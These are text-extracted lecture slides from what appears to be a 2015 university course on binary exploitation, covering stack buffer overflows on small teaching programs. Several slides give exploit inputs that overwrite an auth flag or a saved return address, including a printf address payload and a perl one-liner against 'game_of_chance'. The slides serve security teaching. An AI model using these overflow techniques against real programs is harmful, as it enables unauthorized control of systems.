Академический Документы
Профессиональный Документы
Культура Документы
a
MBE - 02/10/2015
Memory Corruption
Setup
Memory Corruption
Lab info
Submissions for the first lab are due
beginning of class Friday
To submit solutions, email
mbespring2015+lab1@gmail.com
Follow instructions in the README
http://security.cs.rpi.edu/~jblackthorne/README.txt
a
MBE - 02/10/2015
Memory Corruption
Memory Corruption
Lecture Overview
Definition
Buffer overflows
How-to techniques/workflows
Modifying
data/stack
control flow
a
MBE - 02/10/2015
Memory Corruption
Memory Corruption
What is it?
a
MBE - 02/10/2015
Memory Corruption
Memory Corruption
What is it?
fun
a
MBE - 02/10/2015
Memory Corruption
Memory Corruption
Modifying a binarys memory in a way that
was not intended
Broad umbrella term for most of what the
rest of this class will be
The vast majority of system-level exploits
(real-world and competition) involve memory
corruption
a
MBE - 02/10/2015
Memory Corruption
0-overflow_example
Read and understand it
Compile and play with it
What does the stack look like?
a
MBE - 02/10/2015
Memory Corruption
0-overflow_example stack
before
a
MBE - 02/10/2015
Memory Corruption
0-overflow_example stack
after
a
MBE - 02/10/2015
Memory Corruption
0-overflow_example stack
after--exploited
a
MBE - 02/10/2015
Memory Corruption
Buffer Overflows
Whoa.
--Keanu Reeves
a
MBE - 02/10/2015
Memory Corruption
Buffer Overflows
Thats pretty much it
Now, what can we do with that?
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow
Read and understand it
Compile and play with it
What does the stack look like?
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow stack
before strcpy
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow stack
after strcpy
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow code
auth check
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow stack
after strcpy -- lets look at this again
a
MBE - 02/10/2015
Memory Corruption
1-auth_overflow stack
oh thats handy
a
MBE - 02/10/2015
Memory Corruption
Note: when copying and pasting from slides or documents, double-check to make sure the quotation marks are straight ( '
) not magic ( or )
Memory Corruption
2-arg_input_echo
Test program that echos your argument
Challenges:
hex: 0x41414141
int:
1094795585
int:
1094795586
hex: 0x01010101
Hint: pcalc
a
MBE - 02/10/2015
Memory Corruption
2-arg_input_echo solutions
hex: 0x41414141
$ ./arg_input_echo AAAA
int:
1094795585
$ ./arg_input_echo AAAA
int:
1094795586
$ ./arg_input_echo BAAA
hex: 0x01010101
$ ./arg_input_echo
`printf '\x01\x01\x01\x01'`
a
MBE - 02/10/2015
Memory Corruption
Print ABCD
$ echo -e '\x41\x42\x43\x44'
$ printf '\x41\x42\x43\x44'
$ python -c 'print "\x41\x42\x43\x44"'
$ perl -e 'print "\x41\x42\x43\x44";'
a
MBE - 02/10/2015
Memory Corruption
Print 100 As
$ echo/printf (hold down alt; type 100) A
$ python -c 'print "A"*100'
$ perl -e 'print "A" x 100;'
a
MBE - 02/10/2015
Memory Corruption
BASH refresher
http://stackoverflow.
com/a/24998887
Memory Corruption
gdb io
Use command output as an argument
$ r $(your_command_here)
Memory Corruption
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2
Read and understand it
Compile and play with it
What does the stack look like?
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c diff
difference from 1-auth_overflow
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c stack
uh-oh
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c
now what?
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c
now what?
take control
a
MBE - 02/10/2015
Memory Corruption
Libraries (libc)
ELF Executable
.text segment
.data segment
Heap
0xbfff0000 Top of stack
Stack
0xFFFFFFFF End of memory
a
MBE - 02/10/2015
Memory Corruption
34
3-auth_overflow2.c exercise
Take out a sheet of paper
Diagram the stack
Currently right before the strcpy call
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
high address
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
password_buffer
high address
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
auth_flag
password_buffer
high address
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
???
auth_flag
local vars
password_buffer
high address
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
&password_buffer
&password
strcpy arguments
(first argument, dest; second
argument, src)
???
auth_flag
local vars
password_buffer
high address
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c exercise
low address
&password_buffer
&password
strcpy arguments
(first argument, dest; second
argument, src)
???
auth_flag
local vars
password_buffer
high address
a
MBE - 02/10/2015
&password
argument
???
3-auth_overflow2.c exercise
low address
&password_buffer
&password
strcpy arguments
(first argument, dest; second
argument, src)
???
auth_flag
local vars
password_buffer
???
old ebp
high address
a
MBE - 02/10/2015
old eip
IMPORTANT
&password
argument
???
3-auth_overflow2.c main
where do we want to go?
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c stack
lets put it together now
a
MBE - 02/10/2015
Memory Corruption
3-auth_overflow2.c stack
r AAAAAAAAAAAAAAAAAAAAAAAAAAAA
$(printf '\xbf\x84\x04\x08\xbf')
a
MBE - 02/10/2015
Memory Corruption
4-game_of_chance
Read and understand it
Compile and play with it
Wheres the vulnerability?
How do you exploit it?
a
MBE - 02/10/2015
Memory Corruption
4-game_of_chance.c
perl -e 'print "1\n5\nn\n5\n" . "A"
x100 . "\x70\x8d\x04\x08\n" .
"1\nn\n" . "7\n"' | sudo .
/game_of_chance
a
MBE - 02/10/2015
Memory Corruption
Heap overflows
Wow, you have until 04/10 until you have to
deal with them
a
MBE - 02/10/2015
Memory Corruption
Questions?
a
MBE - 02/10/2015
Memory Corruption
Coming up
Next class (Fri) is a lab
After that (Tue) is a lecture on shellcoding
a
MBE - 02/10/2015
Memory Corruption